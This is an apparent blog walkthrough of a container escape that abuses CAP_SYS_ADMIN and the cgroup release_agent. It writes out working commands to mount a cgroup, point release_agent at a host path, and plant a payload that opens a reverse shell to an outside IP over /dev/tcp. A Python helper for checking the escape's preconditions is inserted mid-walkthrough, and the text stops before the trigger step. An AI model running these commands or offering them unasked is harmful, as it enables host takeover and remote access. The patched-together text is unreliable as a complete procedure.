Container breakout: CAP_SYS_ADMIN via Creating a cgroup and using unshare utility

n00🔑
May 6, 2022

Prerequisites:

  1. We need to be root inside the container.
  2. The CAP_SYS_ADMIN capability must be present.
  3. The container filesystem must not be mounted read-only.
  4. We must be able to find a valid path within the host filesystem that reaches the container's files (alternative below).
  5. We must have mount permissions.

First way (finding the host filesystem path via the /etc/mtab file)

Steps

a) Listing the effective capabilities of PID 1 inside the container

capa=`cat /proc/1/status | grep -i 'CapEff' | awk '{print $2}'`; capsh --decode=$capa

b) Mounting the memory cgroup controller, creating a child cgroup x, and enabling notify_on_release so the kernel runs the release_agent when the cgroup empties

mkdir /tmp/cgrp
mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
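As an added audit helper (not the post's own code), the following decodes the CapEff mask that step (a) reads from /proc/1/status and applies the same `perdir=` match the sed above uses on /etc/mtab, so a defender can check whether a running container meets this technique's preconditions (CAP_SYS_ADMIN present, host overlay path leaked). It assumes cgroup v1 with overlayfs, as the post does; the sample status and mtab text are constructed.

```python
# Added audit helper (not the post's code); assumes cgroup v1 + overlayfs as the post does.
import re

# Linux capability names by bit number; CAP_SYS_ADMIN is bit 21.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read",
]

def decode_capeff(status_text):
    """Return the capability names set in the CapEff line of a /proc/<pid>/status dump."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.MULTILINE)
    if not m:
        raise ValueError("no CapEff line found")
    mask = int(m.group(1), 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]

def host_upperdir(mtab_text):
    """Host-side overlay upperdir leaked via /etc/mtab (same 'perdir=' match as the post's sed), or None."""
    m = re.search(r"perdir=([^,\s]*)", mtab_text)
    return m.group(1) if m else None

def breakout_preconditions(status_text, mtab_text):
    """Summarise which of the post's prerequisites hold for this container."""
    caps = decode_capeff(status_text)
    return {
        "cap_sys_admin": "cap_sys_admin" in caps,
        "host_path_leaked": host_upperdir(mtab_text) is not None,
        "effective_caps": len(caps),
    }

# Constructed sample input: Docker's default capability mask with CAP_SYS_ADMIN (bit 21)
# added, and an overlay root line of the shape seen in a container's /etc/mtab.
SAMPLE_STATUS = "Name:\tsh\nCapEff:\t00000000a82425fb\nCapBnd:\t00000000a82425fb\n"
SAMPLE_MTAB = ("overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA,"
               "upperdir=/var/lib/docker/overlay2/CONTAINER_ID/diff,"
               "workdir=/var/lib/docker/overlay2/CONTAINER_ID/work 0 0\n")

if __name__ == "__main__":
    print(breakout_preconditions(SAMPLE_STATUS, SAMPLE_MTAB))
```

Run it against real `cat /proc/1/status` and `cat /etc/mtab` output from a container to see whether the default Docker mask (no cap_sys_admin) or a `--privileged`/`--cap-add SYS_ADMIN` mask is in effect.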

c) Writing the payload to the /cmd file, then assigning the current process to the newly created cgroup by writing its PID to cgroup.procs

echo '#!/bin/sh' > /cmd
echo "sh -i >& /dev/tcp/9.42.116.123/443 0>&1" >> /cmd
